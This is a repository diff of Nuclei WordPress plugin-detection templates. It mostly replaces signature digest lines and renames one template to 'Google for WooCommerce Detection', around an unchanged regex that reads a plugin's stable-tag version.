- '(?i)Stable.tag:\s?([\w.]+)'
|
- '(?i)Stable.tag:\s?([\w.]+)'
|
||||||
# digest: 490a004630440220726dfeb1b9aec239a8781a91130662a6c9bbe0b1d2ec6895f08dcf00cd65b38c02206f92900b2194d1b5d6306ec2c9e9762ca10f8ea9032c94a274dd0cf79a163944:922c64590222798bb761d5b6d8e72950
|
# digest: 4b0a00483046022100e5cc7645ee5779d9c9baac100226bebcb0e0e3b46eb025f82d6bc33a6b132eba022100cc4710d8af997bb46c026d6b03dd99e54fdae08a13675aec1f00a1e8a9d99fa7:922c64590222798bb761d5b6d8e72950
|
|
@ -46,4 +46,4 @@ http:
|
||||||
part: body
|
part: body
|
||||||
regex:
|
regex:
|
||||||
- '(?i)Stable.tag:\s?([\w.]+)'
|
- '(?i)Stable.tag:\s?([\w.]+)'
|
||||||
# digest: 490a00463044022034c2b56e637f1e917bb28d7161e1697868aa593e5017976991b41b969a8cc55d022043852cf78532243a98502e7afee264a060823b43cf007857a07437932fd2328b:922c64590222798bb761d5b6d8e72950
|
# digest: 490a00463044022045028387d51452d9dd292f0cd89d3988a90b512581b0cb41687f6b6c63e1762202204768bb891142158bfc9694e2f89df4803548dcaf851839e94e11751404568af1:922c64590222798bb761d5b6d8e72950
|
|
@ -46,4 +46,4 @@ http:
|
||||||
part: body
|
part: body
|
||||||
regex:
|
regex:
|
||||||
- '(?i)Stable.tag:\s?([\w.]+)'
|
- '(?i)Stable.tag:\s?([\w.]+)'
|
||||||
# digest: 490a00463044022067410e737af5cf30a97c4ee1b8a6c9399f0db4d0ca0584a0cc16916cf451e8cf02201faa8fa9a10711df21ff5a3e0f4bc06682054d79579a642f762101ef3ebe1d62:922c64590222798bb761d5b6d8e72950
|
# digest: 490a004630440220141b3c44c36dec18cd5cf8ff0923ffb4fd0a0ce1ef846441be825fa92ff0887c02206d33bf3312fa4f2a21ff04fb35d8adcff41f5f3b4ea85331683db03c70171cd4:922c64590222798bb761d5b6d8e72950
|
|
@ -46,4 +46,4 @@ http:
|
||||||
part: body
|
part: body
|
||||||
regex:
|
regex:
|
||||||
- '(?i)Stable.tag:\s?([\w.]+)'
|
- '(?i)Stable.tag:\s?([\w.]+)'
|
||||||
# digest: 4b0a00483046022100e2ca75c7396c42a435468465ca5f9c862c8f1119b610c19667bb783fa8929b5c022100cf2337b16d63e5a437490f7772b0a9c9a01e9404b0dd0407c6e96e0cea983431:922c64590222798bb761d5b6d8e72950
|
# digest: 4a0a00473045022100c6d0c781dadc38999555235fe560eace14eed131d3a39a0086b367de14aef9da02206648d71b8b69d6ebd3c6ee46f67086951d0d4dab6ea60ec9932e2aba44add4a6:922c64590222798bb761d5b6d8e72950
|
|
@ -46,4 +46,4 @@ http:
|
||||||
part: body
|
part: body
|
||||||
regex:
|
regex:
|
||||||
- '(?i)Stable.tag:\s?([\w.]+)'
|
- '(?i)Stable.tag:\s?([\w.]+)'
|
||||||
# digest: 4a0a00473045022079e14c32b1b1dcdc5c8dcb9569dca76ee1835a97bf30a7a394eb1ab8b98cf7ec022100a3cf28e73ae7ca74e43f166f322d0ad73f94b0618cbacc75347b579baec72cac:922c64590222798bb761d5b6d8e72950
|
# digest: 4a0a00473045022000be16170ed47e29b8b7366b7cb1eac8bd10d1c7b87394712bf2c1d714236de002210094e56d61343fe454915065b8d3c11c859b0808b07e7aff9d181b2dd727749dfd:922c64590222798bb761d5b6d8e72950
|
|
@ -46,4 +46,4 @@ http:
|
||||||
part: body
|
part: body
|
||||||
regex:
|
regex:
|
||||||
- '(?i)Stable.tag:\s?([\w.]+)'
|
- '(?i)Stable.tag:\s?([\w.]+)'
|
||||||
# digest: 490a0046304402207af2d3226ebe74556cfdb256f7a8114f7f2876394b303d235fd7fd914fc8983502205643add2a051fb0cb856cf215fa8dca28eecd90383c03148d33ef08c00e73f90:922c64590222798bb761d5b6d8e72950
|
# digest: 4a0a0047304502201813910139681312b8aca80f92c4a94c9b60c1409da31c74b3e256cc4e831518022100f8bcd4057019dbc4af581e4b94a739e8402eabde3c5bb683f2c46211a9349d85:922c64590222798bb761d5b6d8e72950
|
|
@ -46,4 +46,4 @@ http:
|
||||||
part: body
|
part: body
|
||||||
regex:
|
regex:
|
||||||
- '(?i)Stable.tag:\s?([\w.]+)'
|
- '(?i)Stable.tag:\s?([\w.]+)'
|
||||||
# digest: 4a0a00473045022024506a35e4a3879be770e15d99b3177cead88fdf829b79791dd6cccfb62947d5022100fb9c6bb1f2fe1da117e6f85796d0f533214d9e206521b822033188cf325ca9c3:922c64590222798bb761d5b6d8e72950
|
# digest: 4a0a004730450221008422069f96e979ba2445298b6e4d0fd7652953c80ffe82be1713fdd4512e26fa0220639c5c21f7c92a2c58392a1cac76c0d9070e72591cd5197d672c3674148f7a07:922c64590222798bb761d5b6d8e72950
|
|
@ -46,4 +46,4 @@ http:
|
||||||
part: body
|
part: body
|
||||||
regex:
|
regex:
|
||||||
- '(?i)Stable.tag:\s?([\w.]+)'
|
- '(?i)Stable.tag:\s?([\w.]+)'
|
||||||
# digest: 490a00463044022001351879f35ffbfc616588ba613f89fe1c29cdd3b7c15fa1e2ea72c54a24643d02202cb7ae5dae42c0b5df3123d7434b21e3de3e119aada7ccc4fceadde9bb210dca:922c64590222798bb761d5b6d8e72950
|
# digest: 4a0a0047304502205755bab67c356c5c3b37a9a1ded30dd01f395bde3c6a0fc2a23061a42da2b081022100adb1ee4aa603f7a652c7e28dd9da2d459ec27cfc3204c90cf00f6b68008193fa:922c64590222798bb761d5b6d8e72950
|
|
@ -46,4 +46,4 @@ http:
|
||||||
part: body
|
part: body
|
||||||
regex:
|
regex:
|
||||||
- '(?i)Stable.tag:\s?([\w.]+)'
|
- '(?i)Stable.tag:\s?([\w.]+)'
|
||||||
# digest: 490a0046304402205853bfafab9bc4ce91db030acbc31bc432172c03ec7724a027319325b4903e8802207c34979e24a8e94ab7bd37594da35c8bb1fee8f8d631afb7947e2ad91e66d787:922c64590222798bb761d5b6d8e72950
|
# digest: 4a0a00473045022004400237aa2306ef2d33235812b3d8211caeb87f4e4fffa1283ed828788cbf4f022100e6647e859243a8796f87487a31ead050d7881e03a4d3309c5a3e70135950e0f0:922c64590222798bb761d5b6d8e72950
|
|
@ -46,4 +46,4 @@ http:
|
||||||
part: body
|
part: body
|
||||||
regex:
|
regex:
|
||||||
- '(?i)Stable.tag:\s?([\w.]+)'
|
- '(?i)Stable.tag:\s?([\w.]+)'
|
||||||
# digest: 4b0a00483046022100a721fd9533d038a6f2cdcc70cb90b4ef5284c9051866fb9f2bda451d27079bdb022100a1974f14bf5112214149d1a3aead9f9e1943367d19ed377a509f3bf916007c1b:922c64590222798bb761d5b6d8e72950
|
# digest: 4a0a00473045022100a8b8836654e1f904e8571679d41c4381d7db8f2187f414488f90178a4cb3ccba0220127874a8427042394c9ad32bf2f2378cef5a6323407b581ec4807fe8313380a8:922c64590222798bb761d5b6d8e72950
|
|
@ -46,4 +46,4 @@ http:
|
||||||
part: body
|
part: body
|
||||||
regex:
|
regex:
|
||||||
- '(?i)Stable.tag:\s?([\w.]+)'
|
- '(?i)Stable.tag:\s?([\w.]+)'
|
||||||
# digest: 490a00463044022025b1b79c11d9c1d05ebebcad7adf413510695b8059975da36d9801f9f815cd3702205c0c54a7309e9c4e359af0b4823e0dbc9b6dc2d57d4e6f06cd80fad5f10208df:922c64590222798bb761d5b6d8e72950
|
# digest: 4a0a0047304502206563f74fdc7289aa01f33e1e4e13d5b9b04fb9c354ba7ccca462f66583784e000221008a617378cffe449d7f34140cadac89ebe0576d362a7057476bab5f76d600f79c:922c64590222798bb761d5b6d8e72950
|
|
@ -46,4 +46,4 @@ http:
|
||||||
part: body
|
part: body
|
||||||
regex:
|
regex:
|
||||||
- '(?i)Stable.tag:\s?([\w.]+)'
|
- '(?i)Stable.tag:\s?([\w.]+)'
|
||||||
# digest: 4a0a00473045022100c63a8fe7182517e45a40ee901e5f0d075881df55786afa73b2060d4874c8917002204843b014cafede43460ab142e2b774a82ca06d41891b4927bf29a0a5f009d682:922c64590222798bb761d5b6d8e72950
|
# digest: 4a0a0047304502210089a7cf594ac15b59203112e1079f7e5d79e734dd29b7bb4d64c73038ceafe9cf0220667227832e0c8ac451c07a99420662f9f7987a63221fdb586b3882eeae13aaa2:922c64590222798bb761d5b6d8e72950
|
|
@ -46,4 +46,4 @@ http:
|
||||||
part: body
|
part: body
|
||||||
regex:
|
regex:
|
||||||
- '(?i)Stable.tag:\s?([\w.]+)'
|
- '(?i)Stable.tag:\s?([\w.]+)'
|
||||||
# digest: 4a0a004730450220598a4b568a391728619b731cb348216873a586ad30dbaf54195a741154f1d1ac022100d03389b3c000e3c112e112861bcc9f9df0b35b2a10b7b50815ef0b43c94b9ad8:922c64590222798bb761d5b6d8e72950
|
# digest: 4a0a0047304502203335336ce82488c544e4a3526ed55285b78dec6140a374491b9d240c9d21560b022100bd9ff8844226c8dcc0b90d0380075d8c831783c5b5ac3ce919036023e29b6f33:922c64590222798bb761d5b6d8e72950
|
|
@ -46,4 +46,4 @@ http:
|
||||||
part: body
|
part: body
|
||||||
regex:
|
regex:
|
||||||
- '(?i)Stable.tag:\s?([\w.]+)'
|
- '(?i)Stable.tag:\s?([\w.]+)'
|
||||||
# digest: 4a0a0047304502210087f605093b6a11a128e16f4ed25eab0a7a03b68fbb846132f6766cb35774519402200877160a9cf7d0abd9953b634c945859508bd6ca830a7b1eb6eff439a9e33a84:922c64590222798bb761d5b6d8e72950
|
# digest: 4b0a00483046022100c5cd0aee0d0ad42173e5efb8bcb9404ff4f2bc6ee08376ed44554a283f39fd0e022100a815d633e41e4bcde4f58128414cb6a5e7e64f69edcc6b40a39a10dee9ca7489:922c64590222798bb761d5b6d8e72950
|
|
@ -1,7 +1,7 @@
|
||||||
id: wordpress-google-listings-and-ads
|
id: wordpress-google-listings-and-ads
|
||||||
|
|
||||||
info:
|
info:
|
||||||
name: Google Listings & Ads Detection
|
name: Google for WooCommerce Detection
|
||||||
author: ricardomaia
|
author: ricardomaia
|
||||||
severity: info
|
severity: info
|
||||||
reference:
|
reference:
|
||||||
|
@ -46,4 +46,4 @@ http:
|
||||||
part: body
|
part: body
|
||||||
regex:
|
regex:
|
||||||
- '(?i)Stable.tag:\s?([\w.]+)'
|
- '(?i)Stable.tag:\s?([\w.]+)'
|
||||||
# digest: 4b0a004830460221009004c80984e3f18d57a940ede6d5aee63fef3a352398452a0b127a4e458e7a3f022100e37f1f4ed4a88c06927810f8459b6d98b4c42b469d1e321fd0ca7918df62b0ab:922c64590222798bb761d5b6d8e72950
|
# digest: 4b0a0048304602210092a5a5b3a65d200cbaef3172dd567246fd693054723fdaa164edfda3e13a3420022100fd6d0af8ddea1d8b8355788ce2b4c3e86dc0a1b25e7d06799700add87b6c8f08:922c64590222798bb761d5b6d8e72950
|
|
@ -46,4 +46,4 @@ http:
|
||||||
part: body
|
part: body
|
||||||
regex:
|
regex:
|
||||||
- '(?i)Stable.tag:\s?([\w.]+)'
|
- '(?i)Stable.tag:\s?([\w.]+)'
|
||||||
# digest: 4a0a00473045022100833ff19b9930d0f8c9f206e50843dff7862a23d814f2577f3b09d3084a7ee70a02207bf5566f22d1ae0516df07e88eb47d4d4d22b3b2a0af1d320b355ac68970397b:922c64590222798bb761d5b6d8e72950
|
# digest: 4a0a0047304502200215bff7e2dfaf0ca23d8ce30bba181b7b3e15615657381ead57d5abe45760ff022100b845aec40f2cb0539fa1854baf568437a0befe0f371e4482ad10bfb9dd8aebb7:922c64590222798bb761d5b6d8e72950
|
|
@ -46,4 +46,4 @@ http:
|
||||||
part: body
|
part: body
|
||||||
regex:
|
regex:
|
||||||
- '(?i)Stable.tag:\s?([\w.]+)'
|
- '(?i)Stable.tag:\s?([\w.]+)'
|
||||||
# digest: 4b0a00483046022100d905fc7ab715040289a6e6516f734706fbb19a1a8b5c32d10e5d481514ca7e99022100de6ff64997091ef385eba7e1b2f88387204504c869a5d93994f222d99af87013:922c64590222798bb761d5b6d8e72950
|
# digest: 4a0a0047304502200eb21eb71677b02888c973ab210cbde34705205a2122f6caa24f5137cab3008c022100d2dea8c52f211de2f8eec6e4e08b5b5670084e6829d28cbd24f925dd486fb041:922c64590222798bb761d5b6d8e72950
|
|
@ -46,4 +46,4 @@ http:
|
||||||
part: body
|
part: body
|
||||||
regex:
|
regex:
|
||||||
- '(?i)Stable.tag:\s?([\w.]+)'
|
- '(?i)Stable.tag:\s?([\w.]+)'
|
||||||
# digest: 4a0a004730450220685907c041d24bb47b1397f231f8b74facea73a0915fa05d7b8ec150fb14cb0f022100fb8cbec5865a6190bc049324679df8c8fc0961b462942b058fa2dfc3fc4a932d:922c64590222798bb761d5b6d8e72950
|
# digest: 4b0a00483046022100d32c80d1bb55756ac9a2d5763b6cd2dad7ba7f27521b767fe9d9b47205a8d611022100cccf6fa2e1dddfe0d943f5d1fdfd9a5ddbf88fb5428bb9eb8387cf8bf086ec3b:922c64590222798bb761d5b6d8e72950
|
|
@ -46,4 +46,4 @@ http:
|
||||||
part: body
|
part: body
|
||||||
regex:
|
regex:
|
||||||
- '(?i)Stable.tag:\s?([\w.]+)'
|
- '(?i)Stable.tag:\s?([\w.]+)'
|
||||||
# digest: 4a0a00473045022073965b5a62d36c00a65166954f32d93eb10b8ebf8a3e0fc541fe71b5558733e4022100b2fe7426281d2ea9f594334cd3087de5d48892feb27f1253dfa2a4c4d558b172:922c64590222798bb761d5b6d8e72950
|
# digest: 490a00463044022004dc8b2c191923e9d44268cf3c8b3689e839d4b075dd41229046c7d942469b8f02204cc2b00610d23d6d1ac91b1673a74bcaa21f3a34bd413bb12ad6ffa3e6f577a0:922c64590222798bb761d5b6d8e72950
|
|
@ -46,4 +46,4 @@ http:
|
||||||
part: body
|
part: body
|
||||||
regex:
|
regex:
|
||||||
- '(?i)Stable.tag:\s?([\w.]+)'
|
- '(?i)Stable.tag:\s?([\w.]+)'
|
||||||
# digest: 4a0a00473045022000a0b2ca7d1d4b5f9c8f6f8ea2c09291f86ad718c6ad37198ec48a2279b007da0221008f23686fb62adebaa6ccb4e85e67463b9b30ffcece5e788b197be1e61dc1d902:922c64590222798bb761d5b6d8e72950
|
# digest: 4a0a00473045022100ee3788b509ff21b9b0a12cf5acfd70278ed056ec132330957cc9608fa2863a3402203e7f0cc571ae68a66855becb8d42fcbd57b95d7bec7c83c68890c2b7c1b4868e:922c64590222798bb761d5b6d8e72950
|
|
@ -46,4 +46,4 @@ http:
|
||||||
part: body
|
part: body
|
||||||
regex:
|
regex:
|
||||||
- '(?i)Stable.tag:\s?([\w.]+)'
|
- '(?i)Stable.tag:\s?([\w.]+)'
|
||||||
# digest: 490a0046304402203f43527e2330cee2af1ad97a41689d5d27d8996680f626a623e6b2fb1c82b4aa022008b443a277469d585425d5a381417922748510213dde4c834680e0b697f5ad98:922c64590222798bb761d5b6d8e72950
|
# digest: 490a0046304402202cbf0b7784d15313ce5d5f9173e2e76c31ed4c138488cca9c48c2675c549d51b02206f2bd2a80ca10339f62f16e911e5d7278ee57ec12600ddef76eee919de23499f:922c64590222798bb761d5b6d8e72950
|
|
@ -46,4 +46,4 @@ http:
|
||||||
part: body
|
part: body
|
||||||
regex:
|
regex:
|
||||||
- '(?i)Stable.tag:\s?([\w.]+)'
|
- '(?i)Stable.tag:\s?([\w.]+)'
|
||||||
# digest: 4b0a00483046022100cb35ff3426b9a8fd30d49d585f037137b535cfe2a16ade552e397e4e44f1f50a022100a5aafdda77b048e9f628f6820f0340a161cf51fcd31d6b2c63663770a8482e1a:922c64590222798bb761d5b6d8e72950
|
# digest: 4a0a0047304502202d5a6028989e76b86e8f405107f784686c06f6ea5b0510285942ad0ef6068458022100e2c12b741672313c513dcf3913cbb65f79dfbe85b6d0bbfea0ded8850cec67d5:922c64590222798bb761d5b6d8e72950
|
|
@ -46,4 +46,4 @@ http:
|
||||||
part: body
|
part: body
|
||||||
regex:
|
regex:
|
||||||
- '(?i)Stable.tag:\s?([\w.]+)'
|
- '(?i)Stable.tag:\s?([\w.]+)'
|
||||||
# digest: 4a0a00473045022100d79aaac98682ebf2a3e6c0f8f819a9e9e88897ae856c78bea8f9efba4dbd1775022038917d76887481cf03aabeec2f05735c4433e66f07da33eedbf8c4605dfb961b:922c64590222798bb761d5b6d8e72950
|
# digest: 490a0046304402205495d064328450f947e304882e24eb98d34b1e5b3237d968d715876e678aab6102203c7c25ae89debb59fdbcaed86e227e87722d79fbf948085b20a79fa84db955a2:922c64590222798bb761d5b6d8e72950
|
|
@ -46,4 +46,4 @@ http:
|
||||||
part: body
|
part: body
|
||||||
regex:
|
regex:
|
||||||
- '(?i)Stable.tag:\s?([\w.]+)'
|
- '(?i)Stable.tag:\s?([\w.]+)'
|
||||||
# digest: 4a0a0047304502207d8729c2646d34127745472379934a8fc989c5fe0560399e3034174c2060b8d3022100e75b9fc56d6446f27a9c3aa81cc225d20a679f38003f2045d923bfa689bb1488:922c64590222798bb761d5b6d8e72950
|
# digest: 490a0046304402203362eaa84c19aa9effdb58be55d876d78e4d261d89939b64d3c770920c156db90220499b53032c658e9d65c2d9c14a45b364c24f8d78a4f63727619cf9808a7e9230:922c64590222798bb761d5b6d8e72950
|
|
@ -46,4 +46,4 @@ http:
|
||||||
part: body
|
part: body
|
||||||
regex:
|
regex:
|
||||||
- '(?i)Stable.tag:\s?([\w.]+)'
|
- '(?i)Stable.tag:\s?([\w.]+)'
|
||||||
# digest: 4a0a0047304502205e3b2754cbadee3dd5f7e1c2838a0d6619419221e025cdfc994680cd8068524c022100a69b286809d775f512eed8c4ea7c5e2a4f7fa13faf2da6a58bca3d0bb8d49eb3:922c64590222798bb761d5b6d8e72950
|
# digest: 4b0a00483046022100a822b8e885d31348620503a366c6827fc43bc2736149b488aaf5398ada891101022100cfa4b9c3970ebc686d4b4d5806c4c0714c1599247d7b581bbf1c0bcd12f0b8a9:922c64590222798bb761d5b6d8e72950
|
Some files were not shown because too many files have changed in this diff Show More
Loading…
Reference in New Issue